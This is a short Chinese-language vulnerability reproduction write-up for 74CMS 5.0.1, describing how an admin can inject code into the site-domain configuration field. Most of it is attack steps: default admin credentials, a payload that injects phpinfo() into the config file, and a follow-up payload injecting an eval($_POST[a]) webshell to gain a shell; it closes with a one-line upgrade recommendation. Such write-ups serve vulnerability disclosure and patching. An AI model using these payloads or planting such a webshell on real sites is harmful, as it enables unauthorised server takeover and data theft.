漏洞描述:
在74CMS 5.0.1版本中的管理后台由于过滤不严谨,可以向配置文件写入恶意代码导致任意代码执行。
复现过程:
1.访问ip:port
2.访问后台登录页面
http://ip:port/index.php?m=Admin
账号:adminadmin
密码:adminadmin
3.进入后台后,点击:系统——网站配置——在网站域名中填写下面数据使页面返回phpinfo
http://127.0.0.1/.',phpinfo(),'/.com
4.然后保存,保存后刷新当前页面,phpinfo页面便映入眼帘
5.此时再进行登录,登录成功后,只会显示更详细的phpinfo界面,没有其他内容,建议不要随便使用。
然后修改一下代码,便可以直接getshell
6.修改回原先配置信息
7.添加php代码
http://127.0.0.1/.',eval($_POST[a]),'/.com
8.Getshell
修复建议:
升级版本。